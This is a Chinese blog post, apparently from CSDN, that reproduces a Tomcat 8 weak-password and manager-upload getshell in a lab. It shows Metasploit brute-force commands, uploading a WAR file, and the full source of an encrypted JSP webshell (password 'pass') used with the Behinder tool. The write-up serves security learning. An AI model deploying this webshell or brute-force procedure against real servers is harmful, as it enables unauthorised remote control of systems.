Tomcat8 - 弱口令与后台上传getshell的漏洞复现

最新推荐文章于 2024-08-06 22:48:48 发布
最新推荐文章于 2024-08-06 22:48:48 发布
阅读量2.5k 收藏 7
点赞数 2
分类专栏: # Tomcat 文章标签: web 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cscscys/article/details/107690986
版权

Tomcat8 - 弱口令与后台上传getshell的漏洞复现

漏洞形成原因

Tomcat manager 登录界面存在弱口令漏洞(tomcat,tomcat),登录成功后有上传点,
压缩包 xxx.wa r的.war不会被解析,直接访问 xxx/里面的一句话路径,可直接拿到shell

漏洞如何利用

  1. msfconsole 中弱口令爆破,爆破成功后登录;
  2. 找到上传点,上传带有一句话jsp文件的名为xxx.war的包;
  3. 访问 攻击ip地址/xxx/jsp文件路径,再用 webshell 连接工具进行连接。

漏洞复现过程

  • Kali docker 容器中启动此漏洞环境
    在这里插入图片描述
  • 浏览器访问 Kali 的 ip 地址并接上8080端口
    在这里插入图片描述
  • 进入 msfconsole 界面
msfconsole

在这里插入图片描述

  • 查找与 tomcat 相关的模块
search tomcat

在这里插入图片描述

  • 使用 auxiliary/scanner/http/tomcat_mgr_login 模块
use auxiliary/scanner/http/tomcat_mgr_login
  • 查看需要填写哪些参数
show options

在这里插入图片描述

  • 将 rhosts 设置为目标机
set rhosts 172.16.2.174

在这里插入图片描述

  • 进行爆破
run

在这里插入图片描述
带有+号的即为爆破成功的账号密码

  • 点击 Manager App 进行登录
    在这里插入图片描述
  • 登录后找到上传点
    在这里插入图片描述
  • 将带有一句话的111.jsp文件压缩成zip,并且将压缩后的zip文件改名为111.war
  • jsp 一句话木马,密码为pass
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
  • 上传111.war文件
    在这里插入图片描述

在这里插入图片描述

  • 访问 172.16.2.174:8080/111/111.jsp,显示500
    在这里插入图片描述
  • 上冰蝎
    在这里插入图片描述
    漏洞复现成功,

技术萌新,还请各位大牛多多指点!

Peanut886886
关注
专栏目录
Maven使用tomcat8-maven-plugin插件.docx
06-30
Tomcat 是一个流行的 Web 服务器,Maven 提供了一个插件 tomcat8-maven-plugin 来实现 Maven 项目与 Tomcat 服务器的集成。下面我们将详细介绍如何使用 tomcat8-maven-plugin 插件。 tomcat8-maven-plugin 插件的...
Tomcat后台管理漏洞复现(弱口令上传webshell)_tomcat文件上传漏洞复现
2301_78398209的博客
04-14 853
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
tomcat8弱口令&&后台getshell
u014794539的博客
07-16 1456
好哥哥的云服务器搭的靶场 已经知道 Tomcat manager 登录界面存在弱口令漏洞,登录成功后有上传点,压缩包 xxx.war的.war不会被解析,直接访问 xxx/里面的一句话路径,可直接拿到shell 这里是弱口令爆破 抓包上bp,看了一眼是 id:passwd 的形式 还有base64的编码 选择用Custom iterator拼接密码进行爆破 还要取消特殊字符的encode 最后得到密码进入后台的manager/html 将带有一句话的shell.jsp小马压缩成zip,并且将压缩后的
常见中间件漏洞(一、Tomcat合集)
最新发布
2301_76631050的博客
08-06 750
tomcat是一个开源而且免费的jsp服务器,默认端口:8080,属于轻量级应用服务器。它可以实现JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的一款环境。在历史上也披露出来了很多的漏洞,这里我们讲几个经典的漏洞复现
Tomcat8弱口令&后台获取getshell复现(包括搭建环境的问题)
m0_49988054的博客
04-17 388
tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理。Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。
Tomcat8版本--后台管理弱口令登录
weixin_46411728的博客
08-20 1508
Tomcat8 弱口令登录
致远OA A8 status.jsp 信息泄露POC批量验证
布啦啦
03-22 1013
漏洞名称:致远OA A8 status.jsp 信息泄露。
致远OA文件上传漏洞(含批量检测POC)
Karka_的博客
03-20 4488
漏洞描述* 漏洞描述文章内容仅供学习参考请勿用于非法用途。
tomcat8-maven-plugin-3.0-r1655215.jar
10-26
解决tomcat8-maven-plugin-3.0-r1655215.jar阿里云同有的问题。放到路径org\apache\tomcat\maven\tomcat8-maven-plugin\3.0-r1655215\就可以了
Tomcat弱口令扫描的工具.zip
03-31
Tomcat弱口令扫描工具,可自己写字典进行爆破。
Maven使用tomcat8-maven-plugin插件的详细教程
01-09
在网上搜索一堆文章没找到解决方法,只找到了tomcat7-maven-plugin的...并没有找到tomcat8-maven-plugin的plugin,在Maven的中央仓库中根本就没有这个插件: https://repository.apache.org/content/repositories/snaps
Tomcat弱口令扫描工具
07-18
Tomcat弱口令扫描工具,可自己写字典进行爆破。
Tomcat8亲测可用 tomcat-redis-session-manager的jar包
05-26
标题中的“Tomcat8亲测可用 tomcat-redis-session-manager的jar包”指的是一个专为Tomcat8设计的,用于管理session的扩展组件。这个组件实现了将Tomcat应用服务器中的用户session数据存储到Redis分布式缓存系统中,...
apache-tomcat-10.0.8.zip
07-09
Apache Tomcat 软件是Jakarta Servlet、 Jakarta Server Pages、 Jakarta Expression Language、 Jakarta WebSocket、 Jakarta Annotations和 Jakarta Authentication 规范的开源实现 。 压缩包内容: apache-...
tomcat-redis-session-manager-1.2-tomcat-7-java-7
05-07
tomcat-redis-session-manager-1.2-tomcat-7-java-7tomcat-redis-session-manager-1.2-tomcat-7-java-7tomcat-redis-session-manager-1.2-tomcat-7-java-7tomcat-redis-session-manager-1.2-tomcat-7-java-7tomcat-...
tomcat8-server
07-26
【描述】"tomcat8-servertomcat8-servertomcat8-servertomcat8-server" 的重复似乎是一个输入错误,但我们可以理解为强调Tomcat8-Server的核心功能和重要性。Tomcat8在性能、安全性和稳定性上都有显著提升,支持最新...
用JSP求1~10的阶乘
baidu_38958878的博客
05-28 9948
pageEncoding="UTF-8"%> Insert title here     int a=1;   for(int i=1;i %>        } %> for(int i=1;i   { a=a*i; %>          } %>
tomcat8 后台getshell漏洞复现
weixin_54786196的博客
09-03 303
打开哥斯拉 生成jsp木马并保存。在url栏加上jmuma.jsp。找到刚刚jsp木马存放的位置。此时复制连接,用哥斯拉连接。将zip后缀改为war。在此位置上传war包。
CVE-2020-1938-Tomcat漏洞复现
AmyBaby00的博客
06-30 602
CVE-2020-1938-Tomcat漏洞复现步骤: 1、漏洞简介 2、环境搭建 3、启动镜像、并访问Tomcat页面,查看环境搭建成功与否 4、漏洞验证 1、漏洞简介: Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。 攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取有漏洞的Tomcat服务器上Web目录文件。 2、环境搭建: 使用docker拉取 docker...
tomcat弱口令登入后台漏洞复现
07-13
1. **查找漏洞信息**:首先确认该Tomcat版本是否存在已知的弱口令漏洞,这通常可以在安全公告、官方文档或漏洞数据库(如CVE)中找到。 2. **目标环境设置**:确定你的目标Tomcat服务器的IP地址、端口号以及默认...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值